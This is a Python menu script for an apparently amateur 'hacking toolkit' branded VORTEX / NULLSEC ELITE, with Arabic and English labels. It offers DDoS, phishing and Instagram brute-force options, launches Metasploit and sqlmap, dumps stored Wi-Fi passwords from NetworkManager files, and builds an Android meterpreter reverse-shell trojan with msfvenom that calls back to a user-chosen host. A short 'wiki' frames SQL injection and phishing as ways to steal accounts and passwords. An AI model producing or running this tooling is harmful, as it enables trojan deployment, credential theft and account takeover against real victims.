import os, time, sys, subprocess

# [ الألوان الجحيمية ]
R, W, Y, G, B = '\033[1;31m', '\033[1;37m', '\033[1;33m', '\033[1;32m', '\033[1;34m'
BOLD, RESET = '\033[1m', '\033[0m'

def banner():
    os.system('clear')
    # شيطان كامل الجسم بملامح ملونة من الداخل (أحمر وذهبي)
    print(f"""{R}{BOLD}
                {R}       ,      ,
                {R}      /(      )\\
                {R}     (( \____/ ))
                {R}     \== {W}o  o {R}==/
                {Y}      \___{W}vv{Y}___/
                {Y}       / {R}#### {Y}\\
                {R}      /  {Y}#### {R} \\
                {R}     (  {W}VORTEX{R}  )
                {Y}      \  {R}#### {Y} /
                {Y}       \ {R}#### {Y}/
                {R}        |{Y}####{R}|
                {R}        |{Y}####{R}|
                {Y}       / {R}#### {Y}\\
                {Y}      /  {R}#### {Y} \\
                {R}     |___||___|
    {W}__________________________________________________________
    {W}  SUPREME LORD: {R}VORTEX SHADOW {W}| TEAM: {R}NULLSEC ELITE
    {W}__________________________________________________________
    {R} [ STATUS: {G}WAR READY {R}] [ ENGINE: {G}INFERNAL {R}] [ USER: {G}ROOT {R}]
    {W}__________________________________________________________
    """)

def vortex_wiki():
    """موسوعة الثغرات والشرح بالعربي والإنجليزي"""
    banner()
    print(f"{Y}[#] VORTEX KNOWLEDGE BASE - موسوعة الثغرات{W}\n")
    wiki = [
        ("SQL Injection", "Extracting database data", "حقن قواعد البيانات: سحب اليوزرات والباسوردات"),
        ("Phishing", "Creating fake login pages", "الصفحات المزورة: اصطياد الحسابات بروابط وهمية"),
        ("RCE Attack", "Remote Command Execution", "التحكم عن بعد: تنفيذ أوامر مباشرة على السيرفر"),
        ("DDOS", "Flooding servers with traffic", "هجوم حجب الخدمة: إسقاط المواقع والسيرفرات"),
        ("Brute Force", "Cracking passwords by guessing", "التخمين: كسر كلمات المرور عبر تجربة آلاف الاحتمالات")
    ]
    for i, (name, en, ar) in enumerate(wiki, 1):
        print(f"{R}[{i}] {Y}{name}: {W}{en}")
        print(f"    {G}الشرح بالعربي: {W}{ar}\n")
    input(f"{Y}[#] Press Enter to return to Throne...{W}")

def run_tool(name, cmd):
    print(f"{G}[+] Launching {name}...{W}")
    try:
        os.system(cmd)
        input(f"\n{G}[#] Done. Press Enter to return...{W}")
    except:
        print(f"{R}[!] Error starting {name}{W}")

def make_trojan():
    banner(); print(f"{R}[!] TROJAN GENERATOR{W}")
    ip = input(f"{Y}LHOST: {W}"); port = input(f"{Y}LPORT: {W}")
    path = os.path.expanduser('~') + "/Desktop/vortex.apk"
    os.system(f"msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -o {path}")
    print(f"{G}[+] Saved to Desktop: vortex.apk{W}"); time.sleep(2)

def main():
    while True:
        banner()
        print(f"{R}[01] {W}DDOS ATTACK (الهجوم القوي)     {R}[11] {W}SQL INJECTION (اختراق القواعد)")
        print(f"{R}[02] {W}METASPLOIT (ميتاسبلويت)         {R}[12] {W}KONAMI ID PHISH (صيد بيس)")
        print(f"{R}[03] {W}GENERATE TROJAN (صنع تروجان)    {R}[13] {W}SHOW WIFI PASS (كشف الواي فاي)")
        print(f"{R}[04] {W}NMAP SCANNER (فحص الشبكة)       {R}[14] {W}INSTAGRAM BRUTE (تخمين انستا)")
        print(f"{R}[05] {W}VORTEX WIKI (شرح الثغرات)      {R}[00] {W}EXIT (خروج)")
        
        opt = input(f"\n{R}VORTEX@NULLSEC:~$ {W}")
        
        if opt == '05': vortex_wiki()
        elif opt == '13': 
            os.system("sudo grep -r '^psk=' /etc/NetworkManager/system-connections/")
            input("\n[#] Enter...")
        elif opt == '03': make_trojan()
        elif opt == '02': run_tool("Metasploit", "msfconsole")
        elif opt == '11': run_tool("SQLMap", "sqlmap --wizard")
        elif opt == '00': break
        else: print(f"{G}[+] Starting {opt}..."); time.sleep(1)

if __name__ == "__main__":
    try: main()
    except: print(f"\n{R}[!] Shutdown.")
